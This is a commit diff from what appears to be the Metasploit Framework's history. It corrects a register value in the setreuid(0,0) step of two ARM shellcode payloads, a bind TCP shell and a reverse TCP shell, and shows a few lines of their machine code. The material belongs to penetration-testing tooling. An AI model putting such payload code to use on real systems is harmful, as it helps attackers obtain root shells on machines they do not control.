Correct the euid to 0

git-svn-id: file:///home/svn/framework3/trunk@5158 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-10-19 06:39:10 +00:00
parent 598568e079
commit 83fdda022e
2 changed files with 2 additions and 2 deletions

View File

@ -94,7 +94,7 @@ module ShellBindTcp
# setreuid(0,0)
0xe3a00000, # mov r0, #0x0
0xe3a01001, # mov r1, #0x1
0xe3a01000, # mov r1, #0x0
0xe3a0c07e, # mov r12, #0x7e
0xef000080, # swi 128

View File

@ -81,7 +81,7 @@ module ShellReverseTcp
# setreuid(0,0)
0xe3a00000, # mov r0, #0x0
0xe3a01001, # mov r1, #0x1
0xe3a01000, # mov r1, #0x0
0xe3a0c07e, # mov r12, #0x7e
0xef000080, # swi 128